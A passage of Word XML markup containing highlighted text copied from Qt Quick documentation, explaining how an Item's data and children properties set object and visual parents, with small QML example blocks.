        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the item will not be rendered in the scene.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Any object assigned to an </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item's</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1905" w:anchor="data-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property becomes a </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>child</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the item within </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1906" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, for </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memory management purposes</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Additionally, if an object added to the data property is of the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1907" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type, it is also assigned to the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1908" w:anchor="children-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::children</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property and becomes a child of the item within the visual scene hierarchy. (</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Most Qt Quick hierarchy crawling algorithms, especially the rendering algorithms, only consider the visual parent hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For convenience, the Item</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1909" w:anchor="data-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is its</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1910" w:anchor="default-properties" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>default property</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This means that</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> any child item declared within an</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1911" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object without being assigned to a specific property is automatically assigned to the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1912" w:anchor="data-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property and becomes a child of the item as described above. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So, the two code blocks below</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> produce the same result, and you will almost always </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>see the form shown below left, rather than the explicit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shown below right:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1429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6958"/>
        <w:gridCol w:w="7337"/>
      </w:tblGrid>
      <w:tr w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidTr="0060552B">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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtQuick</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2.0</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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Item</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100</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100</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50</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50</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color</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str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"red"</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pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0060552B">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtQuick</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2.0</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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Item</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100</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100</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data</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50</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50</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color</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str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"red"</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rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0060552B">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An item's visual parent </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be changed at any time</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by setting its</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1913" w:anchor="parent-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>parent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property. Thus, an item's </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual parent may not necessarily be the same as its object parent</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When an item becomes the child</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of another item:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The child's</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1914" w:anchor="parent-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>parent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>refers to its parent item</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The parent's</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1915" w:anchor="children-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>children</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1916" w:anchor="childrenRect.x-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>childrenRect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
